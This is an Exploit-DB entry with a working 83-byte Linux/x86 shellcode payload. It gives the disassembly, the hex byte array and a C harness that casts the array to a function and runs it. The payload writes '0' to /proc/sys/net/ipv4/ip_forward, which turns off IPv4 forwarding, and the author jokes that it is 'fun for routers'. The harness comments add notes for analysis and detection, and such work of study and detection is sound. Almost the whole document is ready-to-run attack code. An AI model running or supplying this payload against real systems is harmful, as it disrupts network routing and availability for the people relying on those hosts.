Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes)

2009-01-01T00:00:00
ID EDB-ID:43743
Type exploitdb
Reporter Exploit-DB
Modified 2009-01-01T00:00:00

Description

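Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes). Shellcode (exploit payload) for the Linux x86 platform: it writes '0' to /proc/sys/net/ipv4/ip_forward, which turns IPv4 forwarding off, and then calls exit().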

                                        
                                            /*
    In The Name of G0D
    
    Linux/x86 - Set '/proc/sys/net/ipv4/ip_forward' to '0' & exit() 
    Size : 83 Bytes
    
    fun for routers ;)
    
    Author : By Hamid Zamani (aka HAMIDx9)
    Member of ^^Ashiyane Digital Security Team^^
    

Disassembly of section .text:

08048054 <_start>:
 8048054:   31 c0                   xor    %eax,%eax
 8048056:   50                      push   %eax
 8048057:   68 77 61 72 64          push   $0x64726177
 804805c:   68 5f 66 6f 72          push   $0x726f665f
 8048061:   68 34 2f 69 70          push   $0x70692f34
 8048066:   68 2f 69 70 76          push   $0x7670692f
 804806b:   68 2f 6e 65 74          push   $0x74656e2f
 8048070:   68 73 79 73 2f          push   $0x2f737973
 8048075:   68 72 6f 63 2f          push   $0x2f636f72
 804807a:   66 68 2f 70             pushw  $0x702f
 804807e:   89 e3                   mov    %esp,%ebx
 8048080:   31 c9                   xor    %ecx,%ecx
 8048082:   b1 01                   mov    $0x1,%cl
 8048084:   b0 05                   mov    $0x5,%al
 8048086:   cd 80                   int    $0x80
 8048088:   89 c3                   mov    %eax,%ebx
 804808a:   31 c9                   xor    %ecx,%ecx
 804808c:   51                      push   %ecx
 804808d:   6a 30                   push   $0x30
 804808f:   89 e1                   mov    %esp,%ecx
 8048091:   31 d2                   xor    %edx,%edx
 8048093:   b2 01                   mov    $0x1,%dl
 8048095:   b0 04                   mov    $0x4,%al
 8048097:   cd 80                   int    $0x80
 8048099:   31 c0                   xor    %eax,%eax
 804809b:   83 c0 06                add    $0x6,%eax
 804809e:   cd 80                   int    $0x80
 80480a0:   31 c0                   xor    %eax,%eax
 80480a2:   40                      inc    %eax
 80480a3:   31 db                   xor    %ebx,%ebx
 80480a5:   cd 80                   int    $0x80
*/

#include <stdio.h>
#include <string.h>

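int main(int argc,char **argv)
{
    /*
     * Test harness for the 83-byte Linux/x86 payload disassembled in the
     * header comment. It prints the payload length and then transfers
     * control to the byte array.
     *
     * What the payload does (32-bit int $0x80 ABI, per the disassembly):
     *   1. Builds the path on the stack and calls open (eax=5) with
     *      ecx=1 (O_WRONLY). The pushes assemble
     *      "/proc/sys//net/ipv4/ip_forward" -- note the doubled slash.
     *   2. write (eax=4) of one byte, 0x30 ('0'), to the returned fd.
     *   3. close (eax=6) on that fd.
     *   4. exit (eax=1) with status 0.
     *
     * Notes for analysis and detection:
     *   - The effect is to turn IPv4 forwarding off on the running host,
     *     an availability impact on anything acting as a router or
     *     gateway. The target file is normally writable by root only, so
     *     the write has no effect without that privilege.
     *   - No return value is checked. If open fails, the later syscalls
     *     run with an error value in the registers and the process still
     *     exits with status 0, so the exit code says nothing about
     *     whether the setting changed.
     *   - Because the path carries "//", a rule that matches the literal
     *     canonical path in syscall arguments can miss it; match on the
     *     normalized path, or alert on an unexpected change of the
     *     net.ipv4.ip_forward value itself.
     *   - The array is an automatic (stack) object. Where the stack is
     *     mapped non-executable, the indirect call below faults instead
     *     of running the payload.
     */
    char shellcode[] = "\x31\xc0\x50\x68\x77\x61\x72\x64\x68"
                       "\x5f\x66\x6f\x72\x68\x34\x2f\x69\x70"
                       "\x68\x2f\x69\x70\x76\x68\x2f\x6e\x65"
                       "\x74\x68\x73\x79\x73\x2f\x68\x72\x6f"
                       "\x63\x2f\x66\x68\x2f\x70\x89\xe3\x31"
                       "\xc9\xb1\x01\xb0\x05\xcd\x80\x89\xc3"
                       "\x31\xc9\x51\x6a\x30\x89\xe1\x31\xd2"
                       "\xb2\x01\xb0\x04\xcd\x80\x31\xc0\x83"
                       "\xc0\x06\xcd\x80\x31\xc0\x40\x31\xdb"
                       "\xcd\x80";

    /* Neither argument is used; the casts silence unused-parameter warnings. */
    (void)argc;
    (void)argv;

    /*
     * strlen() stops at the first NUL byte, so a result of 83 also confirms
     * the payload contains no embedded NUL. strlen() returns size_t, which
     * must be printed with %zu; passing it to %d is undefined behaviour.
     */
    printf("Length: %zu\n", strlen(shellcode));

    /* Reinterpret the byte array as a function and call it. */
    (*(void(*)()) shellcode)();

    return 0;
}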